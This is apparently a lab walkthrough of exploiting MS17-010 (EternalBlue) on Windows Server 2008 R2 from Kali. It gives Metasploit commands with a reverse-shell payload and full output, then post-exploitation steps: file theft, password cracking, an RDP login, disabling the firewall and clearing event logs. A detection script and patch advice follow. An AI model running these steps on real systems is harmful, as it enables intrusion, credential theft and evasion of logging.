Exploiting the MS17-010 Vulnerability from Kali
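Lab environment
Target: Windows Server 2008 R2 with port 445 open (the Windows Firewall does not need to be turned off).
Attacker: Kali, using the Meterpreter penetration tool.
Vulnerability: MS17-010, EternalBlue.
Procedure
1) First use Nmap to check whether the target has port 445 open.
2) Start msfconsole on Kali.
3) Scan the target for the vulnerability.
4) Exploit MS17-010 against the target.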
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue    // switch to the exploit module
msf5 exploit(windows/smb/ms17_010_eternalblue) >
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp    // use a reverse-connection payload so the target connects back to Kali
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) >
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.10.129    // target IP address
rhost => 192.168.10.129
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.10.128    // Kali IP address
lhost => 192.168.10.128
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit    // start the attack
[*] Started reverse TCP handler on 192.168.10.128:4444
[*] 192.168.10.129:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.10.129:445 - Host is likely VULNERABLE to MS17-010! - Windows Web Server 2008 R2 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.10.129:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.10.129:445 - Connecting to target for exploitation.
[+] 192.168.10.129:445 - Connection established for exploitation.
[+] 192.168.10.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.10.129:445 - CORE raw buffer dump (46 bytes)
[*] 192.168.10.129:445 - 0x00000000 57 69 6e 64 6f 77 73 20 57 65 62 20 53 65 72 76 Windows Web Serv
[*] 192.168.10.129:445 - 0x00000010 65 72 20 32 30 30 38 20 52 32 20 37 36 30 31 20 er 2008 R2 7601
[*] 192.168.10.129:445 - 0x00000020 53 65 72 76 69 63 65 20 50 61 63 6b 20 31 Service Pack 1
[+] 192.168.10.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.10.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.10.129:445 - Sending all but last fragment of exploit packet
[*] 192.168.10.129:445 - Starting non-paged pool grooming
[+] 192.168.10.129:445 - Sending SMBv2 buffers
[+] 192.168.10.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.10.129:445 - Sending final SMBv2 buffers.
[*] 192.168.10.129:445 - Sending last fragment of exploit packet!
[*] 192.168.10.129:445 - Receiving response from exploit packet
[+] 192.168.10.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.10.129:445 - Sending egg to corrupted connection.
[*] 192.168.10.129:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 192.168.10.129
[*] Meterpreter session 1 opened (192.168.10.128:4444 -> 192.168.10.129:49159) at 2020-11-27 12:06:37 +0800
[+] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >    // exploit succeeded; the target can now be controlled
5) List the directories and files on the target's C: drive.
6) Download a file.
7) Crack the user passwords.
The ciphertext can be cracked at www.cmd5.com.
8) Log in to the target over Remote Desktop.
root@KALI:~# rdesktop -u administrator -p abc123 192.168.10.129:3389
9) Take a screenshot.
10) Turn off the firewall.
meterpreter > shell    // enter the target's command prompt
Process 2848 created.
Channel 4 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
C:\>
C:\>netsh advfirewall set allprofiles state off    // turn off the target's firewall
netsh advfirewall set allprofiles state off
确定。
C:\>
11) Clear the event logs.
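Before clearing, all event logs are visible on the target.
Clear the log information from Kali.
Check the target again: only a single record of the log being cleared remains.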
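Steps 10 and 11 leave their own traces on the target: the record that survives log clearing, and the netsh command that turned the firewall off. The Python sketch below is an added example (not part of the original article) that flags both in exported events and escalates hosts where a log clear follows a firewall-off. The JSON field names, host names and sample events are constructed, and matching the netsh command assumes command-line auditing is enabled for event 4688.

```python
import json
import re
from datetime import datetime, timedelta

# Constructed sample: JSON lines as a log forwarder might emit them. Field
# names and host names are assumptions; the event IDs are Windows' own.
SAMPLE = """
{"host":"LAB-2008R2","time":"2020-11-27T12:10:02","log":"Security","id":4688,"cmd":"cmd.exe"}
{"host":"LAB-2008R2","time":"2020-11-27T12:10:15","log":"Security","id":4688,"cmd":"netsh advfirewall set allprofiles state off"}
{"host":"LAB-2008R2","time":"2020-11-27T12:14:30","log":"System","id":104}
{"host":"LAB-2008R2","time":"2020-11-27T12:14:31","log":"Security","id":1102}
{"host":"LAB-ADMIN","time":"2020-11-27T09:00:00","log":"Security","id":4688,"cmd":"netsh advfirewall show allprofiles"}
{"host":"LAB-FILE","time":"2020-11-27T03:00:00","log":"Security","id":1102}
"""

# 1102 = Security audit log cleared, 104 = another event log cleared.
LOG_CLEARED = {("Security", 1102), ("System", 104)}
# 4688 = process creation; matching needs command-line auditing enabled.
FW_OFF = re.compile(r"netsh(\.exe)?\s+advfirewall\s+set\s+\w+\s+state\s+off", re.I)


def classify(ev):
    """Return the finding type for one event, or None if it is not of interest."""
    if (ev["log"], ev["id"]) in LOG_CLEARED:
        return "log_cleared"
    if ev["id"] == 4688 and FW_OFF.search(ev.get("cmd", "")):
        return "firewall_disabled"
    return None


def detect(lines, window=timedelta(minutes=30)):
    """Return (findings, hosts where a firewall-off is followed by a log clear)."""
    findings = []
    for line in filter(str.strip, lines.splitlines()):
        ev = json.loads(line)
        kind = classify(ev)
        if kind:
            findings.append((ev["host"], datetime.fromisoformat(ev["time"]), kind))
    findings.sort()  # by host, then time
    escalate = set()
    for host, t, kind in findings:
        if kind != "firewall_disabled":
            continue
        if any(h == host and k == "log_cleared" and timedelta(0) <= t2 - t <= window
               for h, t2, k in findings):
            escalate.add(host)
    return findings, sorted(escalate)
```

A lone log-clear (LAB-FILE in the sample) is still reported as a finding but not escalated, since administrators clear logs for ordinary reasons too.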
Defending against MS17-010
1) Apply the patches.
KB976932 (SP1), KB4012212, KB4012215
2) Use the Windows Firewall advanced settings to block connections to port 445.
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.10.128:4444
[*] 192.168.10.129:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.10.129:445 - Host is likely VULNERABLE to MS17-010! - Windows Web Server 2008 R2 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.10.129:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.10.129:445 - Connecting to target for exploitation.
[+] 192.168.10.129:445 - Connection established for exploitation.
[+] 192.168.10.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.10.129:445 - CORE raw buffer dump (46 bytes)
[*] 192.168.10.129:445 - 0x00000000 57 69 6e 64 6f 77 73 20 57 65 62 20 53 65 72 76 Windows Web Serv
[*] 192.168.10.129:445 - 0x00000010 65 72 20 32 30 30 38 20 52 32 20 37 36 30 31 20 er 2008 R2 7601
[*] 192.168.10.129:445 - 0x00000020 53 65 72 76 69 63 65 20 50 61 63 6b 20 31 Service Pack 1
[+] 192.168.10.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.10.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.10.129:445 - Sending all but last fragment of exploit packet
[*] 192.168.10.129:445 - Starting non-paged pool grooming
[+] 192.168.10.129:445 - Sending SMBv2 buffers
[+] 192.168.10.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.10.129:445 - Sending final SMBv2 buffers.
[*] 192.168.10.129:445 - Sending last fragment of exploit packet!
[*] 192.168.10.129:445 - Receiving response from exploit packet
[+] 192.168.10.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.10.129:445 - Sending egg to corrupted connection.
[*] 192.168.10.129:445 - Triggering free of corrupted buffer.
[-] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
msf5 exploit(windows/smb/ms17_010_eternalblue) >
As you can see, the connection fails!